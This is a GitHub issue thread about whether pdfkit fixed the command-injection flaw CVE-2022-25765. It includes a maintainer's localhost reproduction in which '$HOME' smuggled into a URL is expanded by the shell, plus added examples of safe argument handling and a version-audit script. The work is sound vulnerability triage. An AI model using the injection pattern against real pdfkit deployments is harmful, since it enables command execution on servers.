
CVE 2022-25765 was fixed

Open BigG1947 opened this issue 3 years ago • 2 comments

Hi, it looks like CVE-2022-25765 was fixed in v0.8.7. Can I create a PR with a patched CVE-2022-25765.yml?

BigG1947 avatar Oct 06 '22 08:10 BigG1947

It's not fixed. @postmodern Please mark version v0.8.7 as vulnerable.

https://github.com/pdfkit/pdfkit/issues/517

MuhammetDilmac avatar Oct 08 '22 08:10 MuhammetDilmac

Had to confirm locally:

`Gemfile`:

```ruby
source 'https://rubygems.org/'

# `dnf install wkhtmltopdf` / `apt install wkhtmltopdf`
gem 'pdfkit', '~> 0.8.7'
gem 'webrick'
gem 'sinatra'
```

`test.rb`:

```ruby
require 'bundler/setup'
require 'pdfkit'

# `$HOME` should reach the server literally; if the server sees it expanded,
# the URL was passed through a shell.
PDFKit.new("http://localhost:3000/?home=$HOME").to_pdf
```

`app.rb`:

```ruby
require 'bundler/setup'
require 'sinatra/base'

class App < Sinatra::Base

  get '/' do
    puts "Received HOME: #{params['home']}"

    halt 200, "Got your HOME lol"
  end

end

App.run!(host: 'localhost', port: 3000)
```

In terminal 1:

```
$ ruby test.rb
```

In terminal 2:

```
$ ruby app.rb 
[2022-10-08 01:36:48] INFO  WEBrick 1.7.0
[2022-10-08 01:36:48] INFO  ruby 3.1.2 (2022-04-12) [x86_64-linux]
== Sinatra (v3.0.1) has taken the stage on 3000 for development with backup from WEBrick
[2022-10-08 01:36:48] INFO  WEBrick::HTTPServer#start: pid=35616 port=3000
Received HOME: /home/postmodern
::1 - - [08/Oct/2022:01:36:51 PDT] "GET /?home=/home/postmodern HTTP/1.1" 200 17
- -> /?home=/home/postmodern
```

postmodern avatar Oct 08 '22 08:10 postmodern
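The reproduction above shows `$HOME` arriving expanded, which means the URL was interpolated into a command string that `/bin/sh` parsed. The following is an added example, not pdfkit's own code and not its actual wkhtmltopdf invocation: it contrasts that string-building pattern with the two ways Ruby code can hand an untrusted value to an external program without the shell interpreting it. The command line and the `out.pdf` name are illustrative only.

```ruby
require 'shellwords'

# Added example, not pdfkit's code. The command line below is illustrative;
# it is not pdfkit's real wkhtmltopdf invocation.

# The vulnerable pattern: one string that Kernel#system / IO.popen hands to
# the shell, so any metacharacter in `url` ($, ;, |, &, backticks...) is
# interpreted rather than sent to wkhtmltopdf as part of the URL.
def command_via_shell(url, out)
  "wkhtmltopdf --quiet #{url} #{out}"
end

# Fix 1: escape every argument, so the shell sees the URL as literal text.
def command_via_shell_escaped(url, out)
  ["wkhtmltopdf", "--quiet", url, out].map { |a| Shellwords.escape(a) }.join(" ")
end

# Fix 2 (preferred): build an argv array. Passing an Array to IO.popen,
# Kernel#system or Process.spawn bypasses the shell entirely, so there is
# nothing that could expand. Returned so it can be inspected or tested.
def command_argv(url, out)
  ["wkhtmltopdf", "--quiet", url, out]
end

# Round-trip check for fix 1: the argv a shell would reconstruct from the
# escaped string must equal the argv built directly, i.e. the URL survives
# unchanged through the shell's parsing.
def escaping_preserves_argv?(url, out)
  Shellwords.split(command_via_shell_escaped(url, out)) == command_argv(url, out)
end

if __FILE__ == $0
  url = "http://localhost:3000/?home=$HOME"   # the input from the thread
  puts command_via_shell(url, "out.pdf")         # sh would expand $HOME here
  puts command_via_shell_escaped(url, "out.pdf") # \$HOME stays literal
  p   command_argv(url, "out.pdf")               # no shell involved at all
  # To actually run it: IO.popen(command_argv(url, "out.pdf")) { |io| io.read }
end
```

The array form is the one to reach for: it needs no escaping rules at all, and the round-trip check is only there to show that `Shellwords.escape` really does neutralise every metacharacter in the URL when a shell cannot be avoided.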

Now waiting for the maintainer to review https://github.com/pdfkit/pdfkit/pull/519

postmodern avatar Oct 11 '22 05:10 postmodern

Looks like the good pdfkit folks just released 0.8.7.2, which included the fix for this CVE.

rustygeldmacher avatar Oct 18 '22 19:10 rustygeldmacher

Marked >= 0.8.7.2 as patched.

postmodern avatar Oct 18 '22 20:10 postmodern
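To see what "marked >= 0.8.7.2 as patched" means in practice, here is an added example (not ruby-advisory-db's or bundler-audit's code) that evaluates a `patched_versions` / `unaffected_versions` list against the version pinned in a Gemfile.lock using RubyGems' own requirement semantics. The advisory hash and the lock fragment are constructed for the example; the real CVE-2022-25765.yml carries more fields than the ones used here.

```ruby
require 'rubygems'   # Gem::Version / Gem::Requirement

# Added example, not ruby-advisory-db's or bundler-audit's code.

# Constructed advisory record: only the fields this example needs.
PDFKIT_ADVISORY = {
  gem: "pdfkit",
  cve: "2022-25765",
  patched_versions: [">= 0.8.7.2"],
  unaffected_versions: [],
}

# A version is affected unless it satisfies at least one patched or
# unaffected requirement. Entries are Gem::Requirement strings, so
# "~> 0.8.7.2" or ">= 0.8.7.2, < 1.0" work the same way they do in a Gemfile.
def vulnerable?(advisory, version)
  v = Gem::Version.new(version)
  safe = advisory[:patched_versions] + advisory[:unaffected_versions]
  safe.none? { |req| Gem::Requirement.new(req).satisfied_by?(v) }
end

# Minimal Gemfile.lock reader: resolved gems appear under "specs:" as
# "    name (version)" (four-space indent); their dependencies are indented
# six spaces and carry requirements, not versions, so they are skipped.
def locked_versions(lockfile_text)
  lockfile_text.each_line.with_object({}) do |line, acc|
    m = line.match(/\A {4}([^\s(]+) \(([^)]+)\)\s*\z/)
    acc[m[1]] = m[2] if m
  end
end

# Returns [[gem, version, cve], ...] for every locked gem an advisory flags.
def audit(lockfile_text, advisories)
  versions = locked_versions(lockfile_text)
  advisories.filter_map do |adv|
    ver = versions[adv[:gem]]
    [adv[:gem], ver, adv[:cve]] if ver && vulnerable?(adv, ver)
  end
end

# Constructed lock fragment for the example; versions are illustrative.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      pdfkit (0.8.7)
      rack (2.2.4)
      sinatra (3.0.1)
        rack (~> 2.2, >= 2.2.4)
LOCK

if __FILE__ == $0
  p audit(SAMPLE_LOCK, [PDFKIT_ADVISORY])   # [["pdfkit", "0.8.7", "2022-25765"]]
  p vulnerable?(PDFKIT_ADVISORY, "0.8.7.2") # false
end
```

Because `Gem::Version` orders `0.8.7` before `0.8.7.2`, the single requirement `>= 0.8.7.2` is enough to flag the `~> 0.8.7` pin from the reproduction while clearing the release that carries the fix; no separate "vulnerable versions" list is needed.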